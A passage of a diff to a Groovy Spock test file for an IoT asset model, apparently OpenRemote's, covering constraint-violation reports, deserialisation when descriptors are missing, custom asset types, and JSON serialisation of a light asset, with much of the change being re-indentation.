+    modelTestAsset.getAttribute("custom2").flatMap {it.value}.orElse(null).y == 5.678d
+    modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    } != null
+    modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) != null
+    modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.get().range == 110
+    modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.get().active != null
+    modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.get().active.booleanValue()
+
+    when: "The attribute values violate the constraints"
+    modelTestAsset.getAttribute(ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = -1
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.NEGATIVE_INT_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = 1
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = "abc"
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = [
+        ("key1"): 1d
+      ] as ValueType.DoubleMap
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = ["arrayValue1"] as String[]
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_ENUM_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = null
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = "NotAllowed"
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_NUMBER_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = 3.0d
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = timerService.getCurrentTimeMillis() + 100000
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = timerService.getNow().plusMillis(100000).toDate()
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.FUTURE_ISO8601_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = DateTimeFormatter.ISO_INSTANT.format(timerService.getNow().minus(1, ChronoUnit.DAYS))
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.FUTURE_OR_PRESENT_TIMESTAMP_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = timerService.getNow().minus(1, ChronoUnit.DAYS).toEpochMilli()
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = ""
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = [] as ValueType.BooleanMap
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = [] as Integer[]
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = "      "
+    }
+    modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = new ModelTestAsset.TestObject(90, null)
+    }
+    modelTestAsset.getAttribute("custom1").ifPresent {it.value = 123}
+    modelTestAsset.getAttribute("custom2").ifPresent {it.value = null}
+    modelTestAsset = assetResource.update(null, modelTestAsset.id, modelTestAsset)
+
+    then: "a constraint violation exception should be thrown"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
     }
 
-    def "Retrieving all asset model info"() {
+    when: "the report is extracted"
+    report = ex.response.readEntity(ViolationReport)
 
-        when: "the asset type value descriptor is retrieved"
-        def assetValueType = ValueUtil.getValueDescriptor(ValueType.ASSET_TYPE.getName())
+    then: "it should contain all the errors"
+    report.propertyViolations.size() == 19
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be greater than or equal to 0"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.NEGATIVE_INT_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be less than or equal to 0"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.SIZE_STRING_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "size must be between 5 and 10"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "size must be between 2 and 3"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "size must be between 2 and 3"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.ALLOWED_VALUES_ENUM_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must not be null"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.ALLOWED_VALUES_STRING_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be one of [Allowed1, Allowed2]"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.ALLOWED_VALUES_NUMBER_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be one of [1.5, 2.5]"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be a past date"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be a date in the past or in the present"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.FUTURE_ISO8601_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be a future date"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.FUTURE_OR_PRESENT_TIMESTAMP_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be a date in the present or in the future"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must not be empty"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must not be empty"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must not be empty"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "Not blank custom message"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR.name}].value.range" && it.message == "must be greater than or equal to 100"
+    }
+    report.propertyViolations.any {
+      it.path == "attributes[${ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR.name}].value.active" && it.message == "must not be null"
+    }
+    report.classViolations.size() == 1
+    report.classViolations.get(0).path == ""
+    report.classViolations.get(0).message == "Asset is not valid"
 
-        then: "it should contain an allowed values constraint with all asset types listed"
-        assetValueType.isPresent()
-        assetValueType.get().constraints != null
-        assetValueType.get().constraints.find {it instanceof ValueConstraint.AllowedValues} as ValueConstraint.AllowedValues != null
-        (assetValueType.get().constraints.find {it instanceof ValueConstraint.AllowedValues} as ValueConstraint.AllowedValues).allowedValues.length == ValueUtil.getAssetInfos().length
-        (assetValueType.get().constraints.find {it instanceof ValueConstraint.AllowedValues} as ValueConstraint.AllowedValues).allowedValues.any { (it == GroupAsset.class.getSimpleName()) }
+    when: "we convert the asset to JSON object so we can manipulate it"
+    modelTestAsset = updatedModelTestAsset // Reset attributes to valid values
+    def assetObjectNode = ValueUtil.convert(modelTestAsset, ObjectNode) as ObjectNode
 
-        when: "all asset model infos are retrieved"
-        def assetInfos = assetModelResource.getAssetInfos(null, null, null)
+    and: "we simulate an attribute descriptor being removed or changed (by changing the attribute name)"
+    def noDescriptorAttr = ((ObjectNode)assetObjectNode.get("attributes")).remove(ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR.name) as ObjectNode
+    noDescriptorAttr.put("name", "missingAttr")
+    ((ObjectNode)assetObjectNode.get("attributes")).set("missingAttr", noDescriptorAttr)
 
-        then: "the asset model infos should be available"
-        assetInfos.size() > 0
-        assetInfos.size() == ValueUtil.assetInfoMap.size()
-        def velbusTcpAgent = assetInfos.find {it.assetDescriptor.type == VelbusTCPAgent.class}
-        velbusTcpAgent != null
-        !velbusTcpAgent.attributeDescriptors.get(VelbusTCPAgent.HOST.name).optional
-        !velbusTcpAgent.attributeDescriptors.get(VelbusTCPAgent.PORT.name).optional
+    and: "we simulate a meta item descriptor being removed or changed (by changing the meta item name)"
+    def noDescriptorMeta = ((ObjectNode)((ObjectNode)((ObjectNode)assetObjectNode.get("attributes")).get(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR.name)).get("meta")).remove(MetaItemType.CONSTRAINTS.name)
+    ((ObjectNode)((ObjectNode)((ObjectNode)assetObjectNode.get("attributes")).get(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR.name)).get("meta")).set("missingMeta", noDescriptorMeta)
 
-        when: "all value descriptors are retrieved"
-        def valueDescriptors = assetModelResource.getValueDescriptors(null, null)
+    and: "we simulate a value descriptor being removed or changed (by changing the type name of an attribute)"
+    ((ObjectNode)((ObjectNode)assetObjectNode.get("attributes")).get(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR.name)).put("type", "missingType")
 
-        then: "the value descriptors should be correctly serialised/deserialised"
-        valueDescriptors.size() > 0
-        valueDescriptors.every {it.value.name == it.key && it.value.type != null & it.value.jsonType != null}
-        valueDescriptors.get(ValueType.ASSET_QUERY.name) == ValueType.ASSET_QUERY
-        valueDescriptors.get(ValueType.ASSET_QUERY.name).jsonType == ValueType.ASSET_QUERY.jsonType
+    and: "we simulate a value descriptor being removed on a custom attribute (by changing the type name of the attribute)"
+    ((ObjectNode)((ObjectNode)assetObjectNode.get("attributes")).get("custom1")).put("type", "missingType2")
 
-        when: "represented as JSON"
-        def valueDescriptorsJSON = ValueUtil.parse(ValueUtil.asJSON(valueDescriptors).orElse(null), Object).get()
+    and: "we deserialise the object back into an Asset"
+    modelTestAsset = ValueUtil.parse(assetObjectNode.toString(), Asset).orElse(null) as ModelTestAsset
 
-        then: "should be a map of objects"
-        valueDescriptorsJSON instanceof Map
-        ((Map)valueDescriptorsJSON).size() == valueDescriptors.size()
-        ((Map)valueDescriptorsJSON).get(ValueType.TIMESTAMP.name) instanceof Map
+    then: "the attribute with the missing attribute descriptor should still have the correct value type and value should have deserialised correctly"
+    modelTestAsset.getAttribute("missingAttr").map {it.type}.orElse(null) == ValueType.TIMESTAMP
+    modelTestAsset.getAttribute("missingAttr").flatMap {it.value}.orElse(null) instanceof Long
 
-        when: "all meta item descriptors are retrieved"
-        def metaItemDescriptors = assetModelResource.getMetaItemDescriptors(null, null)
+    and: "the meta item with the missing meta item descriptor should now have no value type and the value should be an array of generic maps representing the value constraints"
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.getMeta().get("missingMeta")
+    }.orElse(null) != null
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.getMeta().get("missingMeta")
+    }.orElse(null).type == null
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.getMeta().get("missingMeta")
+    }.flatMap {
+      it.value
+    }.orElse(null).getClass().isArray()
+    Array.getLength(modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.getMeta().get("missingMeta")
+    }.flatMap {
+      it.value
+    }.orElse(null)) == 1
+    Array.get(modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.getMeta().get("missingMeta")
+    }.flatMap {
+      it.value
+    }.orElse(null), 0) instanceof Map
 
-        then: "the meta item descriptors should be correctly serialised/deserialised"
-        metaItemDescriptors.size() > 0
+    and: "the well known attribute with the missing value type should have the correct value type"
+    modelTestAsset.getAttribute(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR.name).map {
+      it.type
+    }.orElse(null) == ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR.type
 
-        when: "represented as JSON"
-        def metaItemDescriptorsJSON = ValueUtil.parse(ValueUtil.asJSON(metaItemDescriptors).orElse(null), Object).get()
+    and: "the custom attribute with the missing value type should have no value type but the value should still be there"
+    modelTestAsset.getAttribute("custom1").map {it.type}.isEmpty()
+    modelTestAsset.getAttribute("custom1").flatMap {it.value}.orElse(null) == 456
 
-        then: "should be an array of string values"
-        metaItemDescriptorsJSON instanceof Map
-        ((Map)metaItemDescriptorsJSON).size() == metaItemDescriptors.size()
-        ((Map)metaItemDescriptorsJSON).get(MetaItemType.ATTRIBUTE_LINKS.name) instanceof Map
-        ((Map)((Map)metaItemDescriptorsJSON).get(MetaItemType.ATTRIBUTE_LINKS.name)).get("name") == MetaItemType.ATTRIBUTE_LINKS.name
-        ((Map)((Map)metaItemDescriptorsJSON).get(MetaItemType.ATTRIBUTE_LINKS.name)).get("type") == "${ValueType.ATTRIBUTE_LINK.name}[]"
+    when: "the attribute with the missing attribute descriptor now violates its' previous constraint"
+    modelTestAsset.getAttribute("missingAttr").ifPresent {
+      it.value = timerService.getCurrentTimeMillis() + 100000
     }
 
-    def "Retrieving a specific asset model info"() {
-        when: "The Thing Asset model info is retrieved"
-        def thingAssetInfo = assetModelResource.getAssetInfo(null, null, ThingAsset.DESCRIPTOR.name)
+    and: "this asset is now merged"
+    modelTestAsset = assetResource.update(null, modelTestAsset.id, modelTestAsset)
 
-        then: "the asset model should be available"
-        thingAssetInfo != null
-        thingAssetInfo.assetDescriptor != null
-        thingAssetInfo.attributeDescriptors != null
-        thingAssetInfo.metaItemDescriptors != null
-        thingAssetInfo.valueDescriptors != null
-        thingAssetInfo.attributeDescriptors.get(Asset.LOCATION.name) == Asset.LOCATION
-        thingAssetInfo.metaItemDescriptors.contains(MetaItemType.AGENT_LINK)
-        ValueUtil.getAssetDescriptor(ThingAsset.class) != null
-        ValueUtil.getAgentDescriptor(SimulatorAgent.class) != null
+    then: "it should succeed and attribute value should be correct"
+    modelTestAsset != null
+    modelTestAsset.getAttribute("missingAttr").flatMap {
+      it.value
+    }.orElse(null) == timerService.getCurrentTimeMillis() + 100000
 
-        when: "the http test server agent descriptor is retrieved (the test asset model provider should have registered test agents and assets)"
-        def testAgentDescriptor = ValueUtil.getAgentDescriptor(HTTPServerTestAgent.DESCRIPTOR.name).orElse(null)
-
-        then: "the descriptor should have been found"
-        assert testAgentDescriptor != null
-
-        and: "the descriptor should contain an agent link schema"
-        def schema = ValueUtil.getSchema(AgentLink.class)
-        def schema2 = ValueUtil.getSchema(ValueType.IntegerMap.class)
-        assert schema != null
-        assert schema.get("oneOf") != null
-        assert schema.get("oneOf").size() == ValueUtil.getAssetDescriptors(null).findAll {it instanceof AgentDescriptor}.collect {(it as AgentDescriptor).getAgentLinkClass()}.unique {it.getSimpleName()}.size()
-        assert schema2 != null
-        assert schema2.get("type").asText() == "object"
-        assert schema2.get("additionalProperties") != null
-        assert schema2.get("additionalProperties").get("type").asText() == "integer"
+    when: "we simulate a missing asset type"
+    def updateResult = persistenceService.doReturningTransaction {em ->
+      def query = em.createNativeQuery("update asset set type = 'MissingAssetType' where id = '" + modelTestAsset.id + "';")
+      return query.executeUpdate()
     }
 
-    def "Serialize/Deserialize asset model"() {
-        given: "An asset"
-        def parentId = UniqueIdentifierGenerator.generateId()
-        def createdDate = Instant.now()
-        def asset = new LightAsset("Test light")
+    then: "it should have succeeded"
+    updateResult == 1
+
+    when: "the model test asset is now fetched"
+    def missingAssetTypeAsset = assetResource.get(null, modelTestAsset.id)
+
+    then: "the missing type string should still be present"
+    missingAssetTypeAsset != null
+    missingAssetTypeAsset.type == "MissingAssetType"
+
+    when: "an attribute value violates one of the original asset type attribute descriptor constraints"
+    missingAssetTypeAsset.getAttribute(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {
+      it.value = "    "
+    }
+    missingAssetTypeAsset = assetResource.update(null, missingAssetTypeAsset.id, missingAssetTypeAsset)
+
+    then: "the update should succeed because the descriptor is no longer associated with the asset"
+    missingAssetTypeAsset.getAttribute(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == "    "
+
+    when: "a custom asset type is persisted (using dynamic CustomAsset)"
+    def customAsset = new ThingAsset("Custom asset").setRealm(MASTER_REALM)
+            .addAttributes(
+            new Attribute<>("attr1", ValueType.TIMESTAMP, getClockTimeOf(container)),
+            new Attribute<>("attr2", ValueType.POSITIVE_INTEGER, 3)
+            )
+    customAsset.type = CUSTOM_ASSET_TYPE
+    customAsset = assetResource.create(null, customAsset)
+
+    then: "a constraint violation exception should be thrown"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "the report is extracted"
+    report = ex.response.readEntity(ViolationReport)
+
+    then: "the missing required attribute should be included"
+    report.propertyViolations.size() == 1
+    report.propertyViolations.get(0).path == "attributes.dynamic1"
+    report.propertyViolations.get(0).message == "required attribute is missing"
+    report.classViolations.size() == 1
+    report.classViolations.get(0).path == ""
+    report.classViolations.get(0).message == "Asset is not valid"
+
+    when: "the issue is resolved"
+    customAsset.addAttributes(
+            new Attribute<>("dynamic1", dynamicValueDescriptors[0], "value1")
+            )
+    customAsset = assetResource.create(null, customAsset)
+
+    then: "it should have been persisted"
+    customAsset != null
+    customAsset.type == "CustomAsset"
+    customAsset.getAttribute("attr1").get().type == ValueType.TIMESTAMP
+    customAsset.getAttribute("attr2").get().type == ValueType.POSITIVE_INTEGER
+    customAsset.getAttribute("attr2").get().value.orElse(0) == 3
+
+    when: "we fetch the custom asset again directly from the DB"
+    customAsset = assetResource.get(null, customAsset.id)
+
+    then: "it should still have the correct custom type"
+    customAsset != null
+    customAsset.type == "CustomAsset"
+    customAsset.getAttribute("attr1").get().type == ValueType.TIMESTAMP
+    customAsset.getAttribute("attr2").get().type == ValueType.POSITIVE_INTEGER
+    customAsset.getAttribute("attr2").get().value.orElse(0) == 3
+
+    when: "we make a change to the asset and merge it directly into the asset storage service (bypassing any cloning logic in AssetResource)"
+    customAsset.getAttribute("dynamic1").ifPresent {it.setValue("value2")}
+    customAsset = assetStorageService.merge(customAsset, false, null, null)
+
+    then: "it should succeed"
+    customAsset.getAttribute("dynamic1").flatMap {it.value}.orElse(null) == "value2"
+    customAsset.type == "CustomAsset"
+  }
+
+  def "Retrieving all asset model info"() {
+
+    when: "the asset type value descriptor is retrieved"
+    def assetValueType = ValueUtil.getValueDescriptor(ValueType.ASSET_TYPE.getName())
+
+    then: "it should contain an allowed values constraint with all asset types listed"
+    assetValueType.isPresent()
+    assetValueType.get().constraints != null
+    assetValueType.get().constraints.find {
+      it instanceof ValueConstraint.AllowedValues
+    } as ValueConstraint.AllowedValues != null
+    (assetValueType.get().constraints.find {
+      it instanceof ValueConstraint.AllowedValues
+    } as ValueConstraint.AllowedValues).allowedValues.length == ValueUtil.getAssetInfos().length
+    (assetValueType.get().constraints.find {
+      it instanceof ValueConstraint.AllowedValues
+    } as ValueConstraint.AllowedValues).allowedValues.any {
+      (it == GroupAsset.class.getSimpleName())
+    }
+
+    when: "all asset model infos are retrieved"
+    def assetInfos = assetModelResource.getAssetInfos(null, null, null)
+
+    then: "the asset model infos should be available"
+    assetInfos.size() > 0
+    assetInfos.size() == ValueUtil.assetInfoMap.size()
+    def velbusTcpAgent = assetInfos.find {it.assetDescriptor.type == VelbusTCPAgent.class}
+    velbusTcpAgent != null
+    !velbusTcpAgent.attributeDescriptors.get(VelbusTCPAgent.HOST.name).optional
+    !velbusTcpAgent.attributeDescriptors.get(VelbusTCPAgent.PORT.name).optional
+
+    when: "all value descriptors are retrieved"
+    def valueDescriptors = assetModelResource.getValueDescriptors(null, null)
+
+    then: "the value descriptors should be correctly serialised/deserialised"
+    valueDescriptors.size() > 0
+    valueDescriptors.every {
+      it.value.name == it.key && it.value.type != null & it.value.jsonType != null
+    }
+    valueDescriptors.get(ValueType.ASSET_QUERY.name) == ValueType.ASSET_QUERY
+    valueDescriptors.get(ValueType.ASSET_QUERY.name).jsonType == ValueType.ASSET_QUERY.jsonType
+
+    when: "represented as JSON"
+    def valueDescriptorsJSON = ValueUtil.parse(ValueUtil.asJSON(valueDescriptors).orElse(null), Object).get()
+
+    then: "should be a map of objects"
+    valueDescriptorsJSON instanceof Map
+    ((Map)valueDescriptorsJSON).size() == valueDescriptors.size()
+    ((Map)valueDescriptorsJSON).get(ValueType.TIMESTAMP.name) instanceof Map
+
+    when: "all meta item descriptors are retrieved"
+    def metaItemDescriptors = assetModelResource.getMetaItemDescriptors(null, null)
+
+    then: "the meta item descriptors should be correctly serialised/deserialised"
+    metaItemDescriptors.size() > 0
+
+    when: "represented as JSON"
+    def metaItemDescriptorsJSON = ValueUtil.parse(ValueUtil.asJSON(metaItemDescriptors).orElse(null), Object).get()
+
+    then: "should be an array of string values"
+    metaItemDescriptorsJSON instanceof Map
+    ((Map)metaItemDescriptorsJSON).size() == metaItemDescriptors.size()
+    ((Map)metaItemDescriptorsJSON).get(MetaItemType.ATTRIBUTE_LINKS.name) instanceof Map
+    ((Map)((Map)metaItemDescriptorsJSON).get(MetaItemType.ATTRIBUTE_LINKS.name)).get("name") == MetaItemType.ATTRIBUTE_LINKS.name
+    ((Map)((Map)metaItemDescriptorsJSON).get(MetaItemType.ATTRIBUTE_LINKS.name)).get("type") == "${ValueType.ATTRIBUTE_LINK.name}[]"
+  }
+
+  def "Retrieving a specific asset model info"() {
+    when: "The Thing Asset model info is retrieved"
+    def thingAssetInfo = assetModelResource.getAssetInfo(null, null, ThingAsset.DESCRIPTOR.name)
+
+    then: "the asset model should be available"
+    thingAssetInfo != null
+    thingAssetInfo.assetDescriptor != null
+    thingAssetInfo.attributeDescriptors != null
+    thingAssetInfo.metaItemDescriptors != null
+    thingAssetInfo.valueDescriptors != null
+    thingAssetInfo.attributeDescriptors.get(Asset.LOCATION.name) == Asset.LOCATION
+    thingAssetInfo.metaItemDescriptors.contains(MetaItemType.AGENT_LINK)
+    ValueUtil.getAssetDescriptor(ThingAsset.class) != null
+    ValueUtil.getAgentDescriptor(SimulatorAgent.class) != null
+
+    when: "the http test server agent descriptor is retrieved (the test asset model provider should have registered test agents and assets)"
+    def testAgentDescriptor = ValueUtil.getAgentDescriptor(HTTPServerTestAgent.DESCRIPTOR.name).orElse(null)
+
+    then: "the descriptor should have been found"
+    assert testAgentDescriptor != null
+
+    and: "the descriptor should contain an agent link schema"
+    def schema = ValueUtil.getSchema(AgentLink.class)
+    def schema2 = ValueUtil.getSchema(ValueType.IntegerMap.class)
+    assert schema != null
+    assert schema.get("oneOf") != null
+    assert schema.get("oneOf").size() == ValueUtil.getAssetDescriptors(null).findAll {
+      it instanceof AgentDescriptor
+    }.collect {
+      (it as AgentDescriptor).getAgentLinkClass()
+    }.unique {
+      it.getSimpleName()
+    }.size()
+    assert schema2 != null
+    assert schema2.get("type").asText() == "object"
+    assert schema2.get("additionalProperties") != null
+    assert schema2.get("additionalProperties").get("type").asText() == "integer"
+  }
+
+  def "Serialize/Deserialize asset model"() {
+    given: "An asset"
+    def parentId = UniqueIdentifierGenerator.generateId()
+    def createdDate = Instant.now()
+    def asset = new LightAsset("Test light")
             .setId(UniqueIdentifierGenerator.generateId())
             .setRealm(MASTER_REALM)
             .setParentId(parentId)
             .setTemperature(100I)
             .setColourRGB(new ColourRGB(50, 100, 200))
             .addAttributes(
-                new Attribute<>("testAttribute", BIG_NUMBER, 100.5, System.currentTimeMillis())
-                    .addOrReplaceMeta(
-                        new MetaItem<>(MetaItemType.AGENT_LINK, new HTTPAgentLink("http_agent_id")
-                            .setPath("test_path")
-                            .setPagingMode(true))
+            new Attribute<>("testAttribute", BIG_NUMBER, 100.5, System.currentTimeMillis())
+            .addOrReplaceMeta(
+                    new MetaItem<>(MetaItemType.AGENT_LINK, new HTTPAgentLink("http_agent_id")
+                    .setPath("test_path")
+                    .setPagingMode(true))
                     )
             )
-        asset.getAttribute(LightAsset.COLOUR_RGB).ifPresent({
-            it.addOrReplaceMeta(
-                new MetaItem<>(MetaItemType.AGENT_LINK, new DefaultAgentLink("agent_id")
-                    .setValueFilters(
-                        [new SubStringValueFilter(0,10)] as ValueFilter[]
-                    )
-                )
-            )
-        })
-        // Inject properties which are normally done by the backend on retrieval
-        asset.path = [asset.id, parentId]
-        asset.createdOn = createdDate
-        asset.getAttributes().values().forEach {it.setTimestamp(asset.createdOn.toEpochMilli())}
+    asset.getAttribute(LightAsset.COLOUR_RGB).ifPresent({
+      it.addOrReplaceMeta(
+              new MetaItem<>(MetaItemType.AGENT_LINK, new DefaultAgentLink("agent_id")
+              .setValueFilters(
+                      [new SubStringValueFilter(0,10)] as ValueFilter[]
+                      )
+              )
+              )
+    })
+    // Inject properties which are normally done by the backend on retrieval
+    asset.path = [asset.id, parentId]
+    asset.createdOn = createdDate
+    asset.getAttributes().values().forEach {it.setTimestamp(asset.createdOn.toEpochMilli())}
 
-        expect: "the attributes to match the set values"
-        asset.getTemperature().orElse(null) == 100I
-        asset.getColourRGB().map{it.getR()}.orElse(null) == 50I
-        asset.getColourRGB().map{it.getG()}.orElse(null) == 100I
-        asset.getColourRGB().map{it.getB()}.orElse(null) == 200I
+    expect: "the attributes to match the set values"
+    asset.getTemperature().orElse(null) == 100I
+    asset.getColourRGB().map{it.getR()}.orElse(null) == 50I
+    asset.getColourRGB().map{it.getG()}.orElse(null) == 100I
+    asset.getColourRGB().map{it.getB()}.orElse(null) == 200I
 
-        when: "the asset is serialised using default object mapper"
-        def assetStr = ValueUtil.asJSON(asset).orElse(null)
+    when: "the asset is serialised using default object mapper"
+    def assetStr = ValueUtil.asJSON(asset).orElse(null)
 
-        then: "the string should be valid JSON"
-        def assetObjectNode = ValueUtil.parse(assetStr, ObjectNode.class).get()
-        assetObjectNode.get("name").asText() == "Test light"
-        assetObjectNode.get("path").get(0).asText() == asset.id
-        assetObjectNode.get("path").get(1).asText() == parentId
+    then: "the string should be valid JSON"
+    def assetObjectNode = ValueUtil.parse(assetStr, ObjectNode.class).get()
+    assetObjectNode.get("name").asText() == "Test light"
+    assetObjectNode.get("path").get(0).asText() == asset.id
+    assetObjectNode.get("path").get(1).asText() == parentId
 
-        assetObjectNode.get("attributes").get("colourRGB").get("timestamp").asLong() == createdDate.toEpochMilli()
-        assetObjectNode.get("attributes").get("colourRGB").get("meta").get(MetaItemType.AGENT_LINK.name).isObject()
-        assetObjectNode.get("attributes").get("colourRGB").get("meta").get(MetaItemType.AGENT_LINK.name).get("id").asText() == "agent_id"
-        assetObjectNode.get("attributes").get("colourRGB").get("meta").get(MetaItemType.AGENT_LINK.name).get("type").asText() == DefaultAgentLink.class.getSimpleName()
-        assetObjectNode.get("attributes").get("testAttribute").get("meta").get(MetaItemType.AGENT_LINK.name).isObject()
-        assetObjectNode.get("attributes").get("testAttribute").get("value").decimalValue() == 100.5
-        assetObjectNode.get("attributes").get("testAttribute").get("meta").get(MetaItemType.AGENT_LINK.name).get("id").asText() == "http_agent_id"
-        assetObjectNode.get("attributes").get("testAttribute").get("meta").get(MetaItemType.AGENT_LINK.name).get("type").asText() == HTTPAgentLink.class.getSimpleName()
+    assetObjectNode.get("attributes").get("colourRGB").get("timestamp").asLong() == createdDate.toEpochMilli()
+    assetObjectNode.get("attributes").get("colourRGB").get("meta").get(MetaItemType.AGENT_LINK.name).isObject()
+    assetObjectNode.get("attributes").get("colourRGB").get("meta").get(MetaItemType.AGENT_LINK.name).get("id").asText() == "agent_id"
+    assetObjectNode.get("attributes").get("colourRGB").get("meta").get(MetaItemType.AGENT_LINK.name).get("type").asText() == DefaultAgentLink.class.getSimpleName()
+    assetObjectNode.get("attributes").get("testAttribute").get("meta").get(MetaItemType.AGENT_LINK.name).isObject()
+    assetObjectNode.get("attributes").get("testAttribute").get("value").decimalValue() == 100.5
+    assetObjectNode.get("attributes").get("testAttribute").get("meta").get(MetaItemType.AGENT_LINK.name).get("id").asText() == "http_agent_id"
